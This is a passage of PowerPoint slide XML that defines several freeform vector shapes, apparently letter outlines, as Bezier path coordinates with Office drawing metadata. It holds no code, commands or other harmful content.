            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 184 w 204"/>
                <a:gd name="T1" fmla="*/ 124 h 222"/>
                <a:gd name="T2" fmla="*/ 204 w 204"/>
                <a:gd name="T3" fmla="*/ 105 h 222"/>
                <a:gd name="T4" fmla="*/ 108 w 204"/>
                <a:gd name="T5" fmla="*/ 0 h 222"/>
                <a:gd name="T6" fmla="*/ 0 w 204"/>
                <a:gd name="T7" fmla="*/ 111 h 222"/>
                <a:gd name="T8" fmla="*/ 115 w 204"/>
                <a:gd name="T9" fmla="*/ 222 h 222"/>
                <a:gd name="T10" fmla="*/ 204 w 204"/>
                <a:gd name="T11" fmla="*/ 165 h 222"/>
                <a:gd name="T12" fmla="*/ 187 w 204"/>
                <a:gd name="T13" fmla="*/ 151 h 222"/>
                <a:gd name="T14" fmla="*/ 170 w 204"/>
                <a:gd name="T15" fmla="*/ 162 h 222"/>
                <a:gd name="T16" fmla="*/ 119 w 204"/>
                <a:gd name="T17" fmla="*/ 192 h 222"/>
                <a:gd name="T18" fmla="*/ 36 w 204"/>
                <a:gd name="T19" fmla="*/ 124 h 222"/>
                <a:gd name="T20" fmla="*/ 184 w 204"/>
                <a:gd name="T21" fmla="*/ 124 h 222"/>
                <a:gd name="T22" fmla="*/ 36 w 204"/>
                <a:gd name="T23" fmla="*/ 94 h 222"/>
                <a:gd name="T24" fmla="*/ 108 w 204"/>
                <a:gd name="T25" fmla="*/ 30 h 222"/>
                <a:gd name="T26" fmla="*/ 169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5" y="124"/>
                    <a:pt x="204" y="124"/>
                    <a:pt x="204" y="105"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="48"/>
                    <a:pt x="172" y="0"/>
                    <a:pt x="108" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="48" y="0"/>
                    <a:pt x="0" y="49"/>
                    <a:pt x="0" y="111"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="172"/>
                    <a:pt x="51" y="222"/>
                    <a:pt x="115" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="181" y="222"/>
                    <a:pt x="204" y="177"/>
                    <a:pt x="204" y="165"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="204" y="151"/>
                    <a:pt x="190" y="151"/>
                    <a:pt x="187" y="151"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="151"/>
                    <a:pt x="174" y="152"/>
                    <a:pt x="170" y="162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="187"/>
                    <a:pt x="132" y="192"/>
                    <a:pt x="119" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="81" y="192"/>
                    <a:pt x="44" y="167"/>
                    <a:pt x="36" y="124"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="184" y="124"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="36" y="94"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="43" y="57"/>
                    <a:pt x="73" y="30"/>
                    <a:pt x="108" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="133" y="30"/>
                    <a:pt x="164" y="42"/>
                    <a:pt x="169"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8" name="Freeform 119">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D006B6FA-CC0B-4566-A98B-CC41E4CC0BA0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId15"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1955800" y="1219200"/>
              <a:ext cx="74613" cy="87313"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 113 w 193"/>
                <a:gd name="T1" fmla="*/ 92 h 222"/>
                <a:gd name="T2" fmla="*/ 79 w 193"/>
                <a:gd name="T3" fmla="*/ 86 h 222"/>
                <a:gd name="T4" fmla="*/ 31 w 193"/>
                <a:gd name="T5" fmla="*/ 58 h 222"/>
                <a:gd name="T6" fmla="*/ 94 w 193"/>
                <a:gd name="T7" fmla="*/ 30 h 222"/>
                <a:gd name="T8" fmla="*/ 144 w 193"/>
                <a:gd name="T9" fmla="*/ 58 h 222"/>
                <a:gd name="T10" fmla="*/ 161 w 193"/>
                <a:gd name="T11" fmla="*/ 75 h 222"/>
                <a:gd name="T12" fmla="*/ 178 w 193"/>
                <a:gd name="T13" fmla="*/ 54 h 222"/>
                <a:gd name="T14" fmla="*/ 178 w 193"/>
                <a:gd name="T15" fmla="*/ 20 h 222"/>
                <a:gd name="T16" fmla="*/ 163 w 193"/>
                <a:gd name="T17" fmla="*/ 0 h 222"/>
                <a:gd name="T18" fmla="*/ 148 w 193"/>
                <a:gd name="T19" fmla="*/ 10 h 222"/>
                <a:gd name="T20" fmla="*/ 95 w 193"/>
                <a:gd name="T21" fmla="*/ 0 h 222"/>
                <a:gd name="T22" fmla="*/ 0 w 193"/>
                <a:gd name="T23" fmla="*/ 58 h 222"/>
                <a:gd name="T24" fmla="*/ 99 w 193"/>
                <a:gd name="T25" fmla="*/ 120 h 222"/>
                <a:gd name="T26" fmla="*/ 163 w 193"/>
                <a:gd name="T27" fmla="*/ 157 h 222"/>
                <a:gd name="T28" fmla="*/ 99 w 193"/>
                <a:gd name="T29" fmla="*/ 192 h 222"/>
                <a:gd name="T30" fmla="*/ 35 w 193"/>
                <a:gd name="T31" fmla="*/ 147 h 222"/>
                <a:gd name="T32" fmla="*/ 18 w 193"/>
                <a:gd name="T33" fmla="*/ 133 h 222"/>
                <a:gd name="T34" fmla="*/ 0 w 193"/>
                <a:gd name="T35" fmla="*/ 153 h 222"/>
                <a:gd name="T36" fmla="*/ 0 w 193"/>
                <a:gd name="T37" fmla="*/ 202 h 222"/>
                <a:gd name="T38" fmla="*/ 15 w 193"/>
                <a:gd name="T39" fmla="*/ 222 h 222"/>
                <a:gd name="T40" fmla="*/ 34 w 193"/>
                <a:gd name="T41" fmla="*/ 203 h 222"/>
                <a:gd name="T42" fmla="*/ 99 w 193"/>
                <a:gd name="T43" fmla="*/ 222 h 222"/>
                <a:gd name="T44" fmla="*/ 193 w 193"/>
                <a:gd name="T45" fmla="*/ 157 h 222"/>
                <a:gd name="T46" fmla="*/ 113 w 193"/>
                <a:gd name="T47" fmla="*/ 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2">
                  <a:moveTo>
                    <a:pt x="113" y="92"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="102" y="90"/>
                    <a:pt x="92" y="88"/>
                    <a:pt x="79" y="86"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="84"/>
                    <a:pt x="31" y="78"/>
                    <a:pt x="31" y="58"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="31" y="45"/>
                    <a:pt x="47" y="30"/>
                    <a:pt x="94" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="135" y="30"/>
                    <a:pt x="142" y="45"/>
                    <a:pt x="144" y="58"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="144" y="66"/>
                    <a:pt x="145" y="75"/>
                    <a:pt x="161" y="75"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="75"/>
                    <a:pt x="178" y="64"/>
                    <a:pt x="178" y="54"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="178" y="20"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="178" y="12"/>
                    <a:pt x="178" y="0"/>
                    <a:pt x="163" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="151" y="0"/>
                    <a:pt x="149" y="7"/>
                    <a:pt x="148" y="10"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="126" y="0"/>
                    <a:pt x="105" y="0"/>
                    <a:pt x="95" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="0"/>
                    <a:pt x="0" y="40"/>
                    <a:pt x="0" y="58"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="104"/>
                    <a:pt x="53" y="113"/>
                    <a:pt x="99" y="120"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="123" y="124"/>
                    <a:pt x="163" y="130"/>
                    <a:pt x="163" y="157"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="163" y="175"/>
                    <a:pt x="144" y="192"/>
                    <a:pt x="99" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="192"/>
                    <a:pt x="48" y="186"/>
                    <a:pt x="35" y="147"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="138"/>
                    <a:pt x="31" y="133"/>
                    <a:pt x="18" y="133"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="133"/>
                    <a:pt x="0" y="143"/>
                    <a:pt x="0" y="153"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="202"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="210"/>
                    <a:pt x="0" y="222"/>
                    <a:pt x="15" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="20" y="222"/>
                    <a:pt x="28" y="222"/>
                    <a:pt x="34" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="58" y="221"/>
                    <a:pt x="85" y="222"/>
                    <a:pt x="99" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="177" y="222"/>
                    <a:pt x="193" y="181"/>
                    <a:pt x="193" y="157"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="193" y="105"/>
                    <a:pt x="129" y="94"/>
                    <a:pt x="113" y="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29" name="Freeform 120">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7848D2EB-B001-40A5-AD89-7ED1DB92152F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId16"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2057400" y="1219200"/>
              <a:ext cx="76200" cy="87313"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 196 w 196"/>
                <a:gd name="T1" fmla="*/ 165 h 222"/>
                <a:gd name="T2" fmla="*/ 179 w 196"/>
                <a:gd name="T3" fmla="*/ 151 h 222"/>
                <a:gd name="T4" fmla="*/ 162 w 196"/>
                <a:gd name="T5" fmla="*/ 162 h 222"/>
                <a:gd name="T6" fmla="*/ 113 w 196"/>
                <a:gd name="T7" fmla="*/ 192 h 222"/>
                <a:gd name="T8" fmla="*/ 35 w 196"/>
                <a:gd name="T9" fmla="*/ 111 h 222"/>
                <a:gd name="T10" fmla="*/ 116 w 196"/>
                <a:gd name="T11" fmla="*/ 30 h 222"/>
                <a:gd name="T12" fmla="*/ 146 w 196"/>
                <a:gd name="T13" fmla="*/ 34 h 222"/>
                <a:gd name="T14" fmla="*/ 168 w 196"/>
                <a:gd name="T15" fmla="*/ 59 h 222"/>
                <a:gd name="T16" fmla="*/ 190 w 196"/>
                <a:gd name="T17" fmla="*/ 36 h 222"/>
                <a:gd name="T18" fmla="*/ 116 w 196"/>
                <a:gd name="T19" fmla="*/ 0 h 222"/>
                <a:gd name="T20" fmla="*/ 0 w 196"/>
                <a:gd name="T21" fmla="*/ 111 h 222"/>
                <a:gd name="T22" fmla="*/ 110 w 196"/>
                <a:gd name="T23" fmla="*/ 222 h 222"/>
                <a:gd name="T24" fmla="*/ 196 w 196"/>
                <a:gd name="T25"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22">
                  <a:moveTo>
                    <a:pt x="196" y="165"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="196" y="151"/>
                    <a:pt x="182" y="151"/>
                    <a:pt x="179" y="151"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="171" y="151"/>
                    <a:pt x="166" y="152"/>
                    <a:pt x="162" y="162"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="159" y="168"/>
                    <a:pt x="150" y="192"/>
                    <a:pt x="113" y="192"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="71" y="192"/>
                    <a:pt x="35" y="157"/>
                    <a:pt x="35" y="111"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="35" y="87"/>
                    <a:pt x="49" y="30"/>
                    <a:pt x="116" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="127" y="30"/>
                    <a:pt x="146" y="30"/>
                    <a:pt x="146" y="34"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="146" y="52"/>
                    <a:pt x="156" y="59"/>
                    <a:pt x="168" y="59"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="180" y="59"/>
                    <a:pt x="190" y="50"/>
                    <a:pt x="190" y="36"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="190" y="0"/>
                    <a:pt x="138" y="0"/>
                    <a:pt x="116" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="30" y="0"/>
                    <a:pt x="0" y="67"/>
                    <a:pt x="0" y="111"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="171"/>
                    <a:pt x="47" y="222"/>
                    <a:pt x="110" y="222"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="179" y="222"/>
                    <a:pt x="196" y="173"/>
                    <a:pt x="196"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0" name="Freeform 121">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB523449-3AB7-4895-B1F4-316E700B364F}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId17"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2151062" y="1219200"/>
              <a:ext cx="87313" cy="87313"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 95 w 227"/>
                <a:gd name="T1" fmla="*/ 125 h 218"/>
                <a:gd name="T2" fmla="*/ 185 w 227"/>
                <a:gd name="T3" fmla="*/ 30 h 218"/>
                <a:gd name="T4" fmla="*/ 206 w 227"/>
                <a:gd name="T5" fmla="*/ 52 h 218"/>
                <a:gd name="T6" fmla="*/ 227 w 227"/>
                <a:gd name="T7" fmla="*/ 31 h 218"/>
                <a:gd name="T8" fmla="*/ 180 w 227"/>
                <a:gd name="T9" fmla="*/ 0 h 218"/>
                <a:gd name="T10" fmla="*/ 95 w 227"/>
                <a:gd name="T11" fmla="*/ 40 h 218"/>
                <a:gd name="T12" fmla="*/ 95 w 227"/>
                <a:gd name="T13" fmla="*/ 24 h 218"/>
                <a:gd name="T14" fmla="*/ 75 w 227"/>
                <a:gd name="T15" fmla="*/ 3 h 218"/>
                <a:gd name="T16" fmla="*/ 20 w 227"/>
                <a:gd name="T17" fmla="*/ 3 h 218"/>
                <a:gd name="T18" fmla="*/ 0 w 227"/>
                <a:gd name="T19" fmla="*/ 18 h 218"/>
                <a:gd name="T20" fmla="*/ 20 w 227"/>
                <a:gd name="T21" fmla="*/ 33 h 218"/>
                <a:gd name="T22" fmla="*/ 61 w 227"/>
                <a:gd name="T23" fmla="*/ 33 h 218"/>
                <a:gd name="T24" fmla="*/ 61 w 227"/>
                <a:gd name="T25" fmla="*/ 188 h 218"/>
                <a:gd name="T26" fmla="*/ 20 w 227"/>
                <a:gd name="T27" fmla="*/ 188 h 218"/>
                <a:gd name="T28" fmla="*/ 0 w 227"/>
                <a:gd name="T29" fmla="*/ 203 h 218"/>
                <a:gd name="T30" fmla="*/ 20 w 227"/>
                <a:gd name="T31" fmla="*/ 218 h 218"/>
                <a:gd name="T32" fmla="*/ 151 w 227"/>
                <a:gd name="T33" fmla="*/ 218 h 218"/>
                <a:gd name="T34" fmla="*/ 171 w 227"/>
                <a:gd name="T35" fmla="*/ 203 h 218"/>
                <a:gd name="T36" fmla="*/ 151 w 227"/>
                <a:gd name="T37" fmla="*/ 188 h 218"/>
                <a:gd name="T38" fmla="*/ 95 w 227"/>
                <a:gd name="T39" fmla="*/ 188 h 218"/>
                <a:gd name="T40" fmla="*/ 95 w 227"/>
                <a:gd name="T41" fmla="*/ 12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7" h="218">
                  <a:moveTo>
                    <a:pt x="95" y="125"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="95" y="78"/>
                    <a:pt x="125" y="30"/>
                    <a:pt x="185" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="185" y="42"/>
                    <a:pt x="194" y="52"/>
                    <a:pt x="206" y="52"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="217" y="52"/>
                    <a:pt x="227" y="44"/>
                    <a:pt x="227" y="31"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="227" y="21"/>
                    <a:pt x="221" y="0"/>
                    <a:pt x="180" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="155" y="0"/>
                    <a:pt x="123" y="9"/>
                    <a:pt x="95" y="40"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="95" y="24"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="95" y="8"/>
                    <a:pt x="92" y="3"/>
                    <a:pt x="75" y="3"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="20" y="3"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="3"/>
                    <a:pt x="0" y="3"/>
                    <a:pt x="0" y="18"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="33"/>
                    <a:pt x="12" y="33"/>
                    <a:pt x="20" y="33"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="61" y="33"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="61" y="188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20" y="188"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="13" y="188"/>
                    <a:pt x="0" y="188"/>
                    <a:pt x="0" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="218"/>
                    <a:pt x="12" y="218"/>
                    <a:pt x="20" y="218"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="151" y="218"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="158" y="218"/>
                    <a:pt x="171" y="218"/>
                    <a:pt x="171" y="203"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="171" y="188"/>
                    <a:pt x="158" y="188"/>
                    <a:pt x="151" y="188"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="95" y="188"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95" y="12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1" name="Freeform 122">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3CB5AAF2-AC29-4F1B-BE1F-0E1361E75097}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId18"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2260600" y="1184275"/>
              <a:ext cx="71438" cy="122238"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 115 w 188"/>
                <a:gd name="T1" fmla="*/ 111 h 305"/>
                <a:gd name="T2" fmla="*/ 95 w 188"/>
                <a:gd name="T3" fmla="*/ 90 h 305"/>
                <a:gd name="T4" fmla="*/ 24 w 188"/>
                <a:gd name="T5" fmla="*/ 90 h 305"/>
                <a:gd name="T6" fmla="*/ 4 w 188"/>
                <a:gd name="T7" fmla="*/ 105 h 305"/>
                <a:gd name="T8" fmla="*/ 24 w 188"/>
                <a:gd name="T9" fmla="*/ 120 h 305"/>
                <a:gd name="T10" fmla="*/ 81 w 188"/>
                <a:gd name="T11" fmla="*/ 120 h 305"/>
                <a:gd name="T12" fmla="*/ 81 w 188"/>
                <a:gd name="T13" fmla="*/ 275 h 305"/>
                <a:gd name="T14" fmla="*/ 20 w 188"/>
                <a:gd name="T15" fmla="*/ 275 h 305"/>
                <a:gd name="T16" fmla="*/ 0 w 188"/>
                <a:gd name="T17" fmla="*/ 290 h 305"/>
                <a:gd name="T18" fmla="*/ 20 w 188"/>
                <a:gd name="T19" fmla="*/ 305 h 305"/>
                <a:gd name="T20" fmla="*/ 167 w 188"/>
                <a:gd name="T21" fmla="*/ 305 h 305"/>
                <a:gd name="T22" fmla="*/ 188 w 188"/>
                <a:gd name="T23" fmla="*/ 290 h 305"/>
                <a:gd name="T24" fmla="*/ 167 w 188"/>
                <a:gd name="T25" fmla="*/ 275 h 305"/>
                <a:gd name="T26" fmla="*/ 115 w 188"/>
                <a:gd name="T27" fmla="*/ 275 h 305"/>
                <a:gd name="T28" fmla="*/ 115 w 188"/>
                <a:gd name="T29" fmla="*/ 111 h 305"/>
                <a:gd name="T30" fmla="*/ 115 w 188"/>
                <a:gd name="T31" fmla="*/ 25 h 305"/>
                <a:gd name="T32" fmla="*/ 90 w 188"/>
                <a:gd name="T33" fmla="*/ 0 h 305"/>
                <a:gd name="T34" fmla="*/ 65 w 188"/>
                <a:gd name="T35" fmla="*/ 25 h 305"/>
                <a:gd name="T36" fmla="*/ 90 w 188"/>
                <a:gd name="T37" fmla="*/ 50 h 305"/>
                <a:gd name="T38" fmla="*/ 115 w 188"/>
                <a:gd name="T39" fmla="*/ 2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5" y="111"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="115" y="95"/>
                    <a:pt x="112" y="90"/>
                    <a:pt x="95" y="90"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="24" y="90"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="90"/>
                    <a:pt x="4" y="90"/>
                    <a:pt x="4" y="105"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="4" y="120"/>
                    <a:pt x="17" y="120"/>
                    <a:pt x="24" y="120"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="81" y="120"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="81" y="275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="20" y="275"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="12" y="275"/>
                    <a:pt x="0" y="275"/>
                    <a:pt x="0" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="0" y="305"/>
                    <a:pt x="13" y="305"/>
                    <a:pt x="20" y="305"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="167" y="305"/>
                  </a:lnTo>
                  <a:cubicBezTo>
                    <a:pt x="175" y="305"/>
                    <a:pt x="188" y="305"/>
                    <a:pt x="188" y="290"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="188" y="275"/>
                    <a:pt x="175" y="275"/>
                    <a:pt x="167" y="275"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="115" y="275"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="115" y="111"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="115" y="25"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="115" y="11"/>
                    <a:pt x="104" y="0"/>
                    <a:pt x="90" y="0"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="0"/>
                    <a:pt x="65" y="11"/>
                    <a:pt x="65" y="25"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="65" y="39"/>
                    <a:pt x="76" y="50"/>
                    <a:pt x="90" y="50"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="104" y="50"/>
                    <a:pt x="115" y="39"/>
                    <a:pt x="115"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2" name="Freeform 123">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C8EEE4CA-3810-4D28-BB87-CBE0E2907119}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr>
              <p:custDataLst>
                <p:tags r:id="rId19"/>
              </p:custDataLst>
            </p:nvPr>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="2347912" y="1219200"/>
              <a:ext cx="92075" cy="130175"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 76 w 237"/>
                <a:gd name="T1" fmla="*/ 86 h 329"/>
                <a:gd name="T2" fmla="*/ 137 w 237"/>
                <a:gd name="T3" fmla="*/ 30 h 329"/>
                <a:gd name="T4" fmla="*/ 202 w 237"/>
                <a:gd name="T5" fmla="*/ 110 h 329"/>
                <a:gd name="T6" fmla="*/ 133 w 237"/>
                <a:gd name="T7" fmla="*/ 191 h 329"/>
                <a:gd name="T8" fmla="*/ 76 w 237"/>
                <a:gd name="T9" fmla="*/ 123 h 329"/>
                <a:gd name="T10" fmla="*/ 76 w 237"/>
                <a:gd name="T11" fmla="*/ 86 h 329"/>
                <a:gd name="T12" fmla="*/ 76 w 237"/>
                <a:gd name="T13" fmla="*/ 196 h 329"/>
                <a:gd name="T14" fmla="*/ 134 w 237"/>
                <a:gd name="T15" fmla="*/ 221 h 329"/>
                <a:gd name="T16" fmla="*/ 237 w 237"/>
                <a:gd name="T17" fmla="*/ 110 h 329"/>
                <a:gd name="T18" fmla="*/ 140 w 237"/>
                <a:gd name="T19" fmla="*/ 0 h 329"/>
                <a:gd name="T20" fmla="*/ 76 w 237"/>
                <a:gd name="T21" fmla="*/ 25 h 329"/>
                <a:gd name="T22" fmla="*/ 56 w 237"/>
                <a:gd name="T23" fmla="*/ 3 h 329"/>
                <a:gd name="T24" fmla="*/ 20 w 237"/>
                <a:gd name="T25" fmla="*/ 3 h 329"/>
                <a:gd name="T26" fmla="*/ 0 w 237"/>
                <a:gd name="T27" fmla="*/ 19 h 329"/>
                <a:gd name="T28" fmla="*/ 19 w 237"/>
                <a:gd name="T29" fmla="*/ 33 h 329"/>
                <a:gd name="T30" fmla="*/ 42 w 237"/>
                <a:gd name="T31" fmla="*/ 33 h 329"/>
                <a:gd name="T32" fmla="*/ 42 w 237"/>
                <a:gd name="T33" fmla="*/ 298 h 329"/>
                <a:gd name="T34" fmla="*/ 20 w 237"/>
                <a:gd name="T35" fmla="*/ 298 h 329"/>
                <a:gd name="T36" fmla="*/ 0 w 237"/>
                <a:gd name="T37" fmla="*/ 314 h 329"/>
                <a:gd name="T38" fmla="*/ 19 w 237"/>
                <a:gd name="T39" fmla="*/ 329 h 329"/>
                <a:gd name="T40" fmla="*/ 99 w 237"/>
                <a:gd name="T41" fmla="*/ 329 h 329"/>
                <a:gd name="T42" fmla="*/ 119 w 237"/>
                <a:gd name="T43" fmla="*/ 314 h 329"/>
                <a:gd name="T44" fmla="*/ 98 w 237"/>
                <a:gd name="T45" fmla="*/ 298 h 329"/>
                <a:gd name="T46" fmla="*/ 76 w 237"/>
                <a:gd name="T47" fmla="*/ 298 h 329"/>
                <a:gd name="T48" fmla="*/ 76 w 237"/>
                <a:gd name="T49" fmla="*/ 19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 h="329">
                  <a:moveTo>
                    <a:pt x="76" y="86"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="76" y="57"/>
                    <a:pt x="105" y="30"/>
                    <a:pt x="137" y="30"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="174" y="30"/>
                    <a:pt x="202" y="67"/>
                    <a:pt x="202" y="110"/>
